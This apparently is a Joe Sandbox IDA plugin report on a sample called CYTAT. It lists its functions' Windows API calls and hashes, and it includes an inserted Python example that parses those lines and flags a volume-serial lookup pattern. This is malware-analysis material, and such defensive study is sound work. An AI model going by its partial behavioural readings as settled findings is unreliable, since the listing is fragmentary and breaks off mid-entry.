                                                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                Similarity
                                                • API ID: ConnectRegistry_memmove_wcslen
                                                • String ID:
                                                • API String ID: 15295421-0
                                                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcstok.LIBCMT ref: 004675B2
                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                • _wcscpy.LIBCMT ref: 00467641
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                • _wcslen.LIBCMT ref: 00467793
                                                • _wcslen.LIBCMT ref: 004677BD
                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                Strings
                                                Similarity
                                                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                • String ID: X
                                                • API String ID: 780548581-3081909835
                                                • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                • CloseFigure.GDI32(?), ref: 0044751F
                                                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                Similarity
                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                • String ID:
                                                • API String ID: 4082120231-0
                                                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                Similarity
                                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                • String ID:
                                                • API String ID: 2027346449-0
                                                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • GetMenu.USER32 ref: 0047A703
                                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                • _wcslen.LIBCMT ref: 0047A79E
                                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                Similarity
                                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                • String ID:
                                                • API String ID: 3257027151-0
                                                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                APIs
                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                Similarity
                                                • API ID: ErrorLastselect
                                                • String ID:
                                                • API String ID: 215497628-0
                                                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                APIs
                                                • GetParent.USER32(?), ref: 0044443B
                                                • GetKeyboardState.USER32(?), ref: 00444450
                                                • SetKeyboardState.USER32(?), ref: 004444A4
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                APIs
                                                • GetParent.USER32(?), ref: 00444633
                                                • GetKeyboardState.USER32(?), ref: 00444648
                                                • SetKeyboardState.USER32(?), ref: 0044469C
                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                APIs
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Similarity
                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                • String ID:
                                                • API String ID: 2354583917-0
                                                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                APIs
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                • String ID:
                                                • API String ID: 896007046-0
                                                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                APIs
                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                • GetFocus.USER32 ref: 00448ACF
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                • String ID:
                                                • API String ID: 3429747543-0
                                                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                • __swprintf.LIBCMT ref: 0045D4E9
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu$\VH
                                                • API String ID: 3164766367-2432546070
                                                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
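Worked example, added here and not part of the Joe Sandbox report: a small Python parser for the API reference lines of this listing, run on the four lines of the entry above, plus a check for the call sequence they show. The argument 00000001 to the first SetErrorMode is the standard Win32 SEM_FAILCRITICALERRORS flag, which suppresses the "no disk in drive" dialog while GetVolumeInformationW probes a volume; that the second SetErrorMode restores the previously saved mode is inferred from the call order, and the "%lu" string from the String ID above is consistent with the volume serial being formatted as a decimal number (a common host-identifier idiom, an interpretation rather than something the report states). The listing prints several stack slots after each call, not only the declared parameters, so the check matches on the first slot only.

```python
import re
from dataclasses import dataclass
from typing import Optional, Union

# Constructed sample input: the four API reference lines of the function listed
# above (SetErrorMode / GetVolumeInformationW / __swprintf / SetErrorMode),
# copied from the report so the parser runs offline.
SAMPLE = """\
• SetErrorMode.KERNEL32(00000001), ref: 0045D459
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
• __swprintf.LIBCMT ref: 0045D4E9
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
"""

SEM_FAILCRITICALERRORS = 0x0001  # standard Win32 SetErrorMode flag

# One API reference line: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional "(slot,slot,...)" stack view, then "ref: <address>".
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_@0-9]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# A stack slot is a hex value, a symbolic name (e.g. Function_00036C2B), or "?" (unknown -> None).
Arg = Union[int, str, None]


@dataclass
class ApiRef:
    api: str
    module: str
    args: list
    ref: int
    subcall: Optional[int] = None  # address of the subcall the line is attributed to


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok


def parse_api_lines(text: str) -> list:
    """Parse report lines into ApiRef records; headers and blank lines are skipped."""
    refs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [_parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        refs.append(ApiRef(m["api"], m["module"], args, int(m["ref"], 16), sub))
    return refs


def volume_serial_pattern(refs) -> Optional[tuple]:
    """Return (set_ref, getvol_ref, restore_ref) when the function silences
    critical-error dialogs, reads volume information, then calls SetErrorMode
    again after it (restoring the saved mode). None if a piece is missing or
    the calls are out of order. Subcall lines are ignored."""
    direct = [r for r in refs if r.subcall is None]
    setmode = [r for r in direct if r.api == "SetErrorMode"]
    getvol = [r for r in direct if r.api.startswith("GetVolumeInformation")]
    if len(setmode) < 2 or not getvol:
        return None
    first, last, gv = setmode[0], setmode[-1], getvol[0]
    if not first.args or first.args[0] != SEM_FAILCRITICALERRORS:
        return None
    if not (first.ref < gv.ref < last.ref):
        return None
    return (first.ref, gv.ref, last.ref)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for r in parsed:
        print(f"{r.ref:08X} {r.module}!{r.api} {r.args}")
    print("volume-serial pattern:", volume_serial_pattern(parsed))
```

The same parser accepts the indented "Part of subcall function" lines that appear in other entries of this listing, so a whole APIs block can be pasted in unchanged; only the direct calls of the function are used for the sequence check.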
                                                APIs
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Msctls_Progress32
                                                • API String ID: 3850602802-3636473452
                                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                • String ID:
                                                • API String ID: 3985565216-0
                                                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                APIs
                                                • _malloc.LIBCMT ref: 0041F707
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • _free.LIBCMT ref: 0041F71A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free_malloc
                                                • String ID: [B
                                                • API String ID: 1020059152-632041663
                                                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                • __calloc_crt.LIBCMT ref: 00413DB0
                                                • __getptd.LIBCMT ref: 00413DBD
                                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                • _free.LIBCMT ref: 00413E07
                                                • __dosmaperr.LIBCMT ref: 00413E12
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                • String ID:
                                                • API String ID: 155776804-0
                                                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                APIs
                                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
